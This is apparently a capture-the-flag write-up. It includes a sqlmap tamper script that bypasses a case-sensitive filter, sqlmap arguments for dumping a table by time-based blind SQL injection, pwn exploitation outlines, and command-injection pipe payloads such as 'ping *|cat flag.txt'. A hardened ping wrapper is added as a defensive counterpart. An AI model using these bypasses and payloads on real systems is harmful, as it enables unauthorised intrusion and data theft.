First, a rant: on day one the flag column of the web100 table was empty, so I assumed it was a trap and went digging through every other table, but it turned out someone had simply trashed it. And on a server that laggy they gave us a time-based blind injection. Unbelievable.
When the URL contains PG_SLEEP in uppercase the server replies "can't use sleep"; testing lowercase showed that pg_sleep runs successfully and is not blocked. So write a tamper script and run it through sqlmap; the tamper code is:
#!/usr/bin/env python
# sqlmap tamper: the filter only matches uppercase PG_SLEEP, so lowercase it.
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = payload.replace("PG_SLEEP", "pg_sleep")
    return retVal
The key sqlmap arguments are --tamper xxx.py --technique T --dbms postgresql -D public -T web100 --dump; the flag is then dumped out of the flag column via the time-based technique.
Recursive {} counting: be careful when copying from the page source, and mind the nesting. Brute force would also work. My script kept giving 267, which was wrong ( ⊙ o ⊙ )!
Quietly tried +1 and -1 and found 266 was accepted.
# -*- coding: utf-8 -*-
def Count():
    s = '''the string without \\'''   # paste the challenge string here (backslashes removed)
    cnt = 0
    left = 0                           # currently open '{' that have not been closed yet
    for i in s:
        if i == '{':
            left += 1
        if i == '}':
            if left > 0:               # count a '}' only when it closes an open '{'
                left -= 1
                cnt += 1
    print(cnt)

Count()

# second step: shift every character of the recovered string by 49
str1 = '62C5J110119120L'
str2 = ''
for i in range(len(str1)):
    str2 += chr(ord(str1[i]) + 49)
print(str2)
Re2:
An interesting reverse: it uses SEH to control the execution flow.
Set a breakpoint in the SEH handler function (0x401000), then trigger an exception.
Inside there is a simple maze.
Each step can be +8, -8, +1 or -1,
going from 0x00409046 to 0x00409053.
You cannot step onto a 0x2A ('*') cell; the path has length 25.
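The maze step above, as an added example that is not part of the original writeup: a breadth-first search over the maze bytes using the four moves the challenge allows (+8/-8 move one row, +1/-1 move one column in an 8-byte-wide grid) and refusing to step onto 0x2A. The challenge's real maze data is not on the page, so the grid below is constructed, and the base address 0x409040 (chosen so that offset 6 is 0x409046 and offset 0x13 is 0x409053) is an assumption; the real path is 25 moves long, the constructed one is shorter.

```python
from collections import deque

# Added example, not the challenge's code.  MAZE is a constructed 4x8 grid and
# the base address 0x409040 is an assumption: offset 6 stands in for 0x409046
# (start) and offset 0x13 for 0x409053 (goal).
WIDTH = 8      # a row is 8 bytes, which is why the moves are +8/-8 (down/up)
WALL = 0x2A    # '*': a cell the player may not step onto

MAZE = (b"******.*"
        b"*....*.*"
        b"*.*..*.*"
        b"*......*")
START = 0x06
GOAL = 0x13

# Move names as the challenge describes them, mapped to byte-offset deltas.
MOVES = {"+8": 8, "-8": -8, "+1": 1, "-1": -1}


def solve(maze, start, goal, wall=WALL):
    """Breadth-first search over flat byte offsets.

    Returns the shortest list of move names from start to goal, or None if
    the goal is unreachable.  Like the binary, this indexes the buffer flat:
    a -1 from column 0 lands on the previous row's last byte, so the maze
    relies on its wall border to stop that (the constructed grid has one).
    """
    if maze[start] == wall or maze[goal] == wall:
        return None
    prev = {start: None}            # offset -> (previous offset, move name)
    queue = deque([start])
    while queue:
        pos = queue.popleft()
        if pos == goal:
            break
        for name, delta in MOVES.items():
            nxt = pos + delta
            if not 0 <= nxt < len(maze) or maze[nxt] == wall or nxt in prev:
                continue
            prev[nxt] = (pos, name)
            queue.append(nxt)
    if goal not in prev:
        return None
    path = []
    cur = goal
    while prev[cur] is not None:    # walk the parent links back to start
        cur, name = prev[cur]
        path.append(name)
    return path[::-1]


def replay(maze, start, moves, wall=WALL):
    """Apply a move list and return the final offset; raises on a wall."""
    pos = start
    for name in moves:
        pos += MOVES[name]
        if not 0 <= pos < len(maze) or maze[pos] == wall:
            raise ValueError("move %s hits a wall at offset %#x" % (name, pos))
    return pos


if __name__ == "__main__":
    path = solve(MAZE, START, GOAL)
    print(len(path), "moves:", " ".join(path))
```

`solve` returns the moves in the order the binary expects them to be fed in; `replay` is the sanity check to run before typing a 25-move answer into a slow remote, since it walks the same buffer and refuses any step onto a wall.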
Re3:
The binary uses a jump table to control execution.
Set a breakpoint on every case of the switch.
Look at the parameters of every crucial function (strcmp, strlen and so on).
Input length is 13; every byte has 0x80 subtracted from it and the result is compared with a string.
Pwn1:
No NX, and there is a global buffer we can write into.
A stack overflow, with no stack cookie.
Place shellcode in the global buffer, use the stack overflow to return into that buffer, get a shell.
Pwn2:
No NX, and there is a global buffer we can write into.
A format string bug (fsb), so we can leak addresses.
A use-after-free (UAF), so we can jump anywhere.
But we cannot keep shellcode in the global buffer, because triggering the UAF corrupts that buffer.
So leak a stack address, then use the UAF to return into a buffer on the stack.
Pwn3:
NX is on, so shellcode cannot execute on the stack or the heap.
SafeStack, so the stack cannot be overflowed.
But there is a format string bug and a command injection.
The filter rejects '>', ';' and '<'; bypass it
with a pipe.
Still cannot get a shell.
Payload: "ping *|ls"
That lists the flag file's name, flag.txt.
Use the payload again: "ping *|cat flag.txt"
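The pipe bypass above, as an added example (my code, not the challenge's): a blacklist that rejects only '>', ';' and '<' lets both of the page's payloads through, next to a hardened wrapper that allowlists the host and runs ping with an argv list instead of a shell string. The challenge's actual filter and ping wrapper are not on the page, so both are modelled here and the concatenated command line is hypothetical.

```python
import re
import subprocess

# Added example, not the challenge's code.  The real service's filter and
# ping wrapper are not on the page; blacklist_allows() models a filter that
# rejects only '>', ';' and '<' (as described) and build_shell_command() is a
# hypothetical wrapper that splices the input into a shell command line.
BLACKLIST = frozenset(">;<")


def blacklist_allows(user_input):
    """Challenge-style check: only the three characters above are rejected.

    A pipe survives, and in a pipeline every stage runs, so `ping *|ls`
    still executes ls and its output still reaches stdout even though the
    ping stage gets filenames (from the * glob) instead of a host and fails.
    """
    return not any(ch in BLACKLIST for ch in user_input)


def build_shell_command(user_input):
    """Vulnerable (hypothetical) wrapper: concatenation into a shell string."""
    return "ping -c 1 " + user_input      # would be handed to sh -c


# Hardened version: allowlist the host, then run ping with an argv list so no
# shell ever parses the input.  The allowlist permits hostnames and IPv4
# literals only (assumption: that is all this service needs).
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.\-]{0,251}[A-Za-z0-9])?")


def is_safe_host(user_input):
    return HOST_RE.fullmatch(user_input) is not None


def build_argv(user_input):
    """Returns the argv for ping, or raises before any metacharacter
    can reach a command line."""
    if not is_safe_host(user_input):
        raise ValueError("rejected host: %r" % user_input)
    return ["ping", "-c", "1", user_input]


def rejected(user_input):
    """True when the hardened path refuses the input before running anything."""
    try:
        build_argv(user_input)
    except ValueError:
        return True
    return False


def run_ping(user_input):
    """Runs ping without a shell (shell=False is the subprocess default)."""
    return subprocess.run(build_argv(user_input), capture_output=True, text=True)


if __name__ == "__main__":
    for payload in ("ping *|ls", "ping *|cat flag.txt", "8.8.8.8; ls", "example.com"):
        print("%-22r blacklist=%-5s allowlist=%s"
              % (payload, blacklist_allows(payload), is_safe_host(payload)))
```

The `__main__` block prints the verdict of both checks on the page's payloads; `run_ping` is the only function that actually executes anything and is not called by default. The point of the hardened path is that validation happens on the host value alone and the argv list never passes through a shell, so there is no metacharacter list to keep complete.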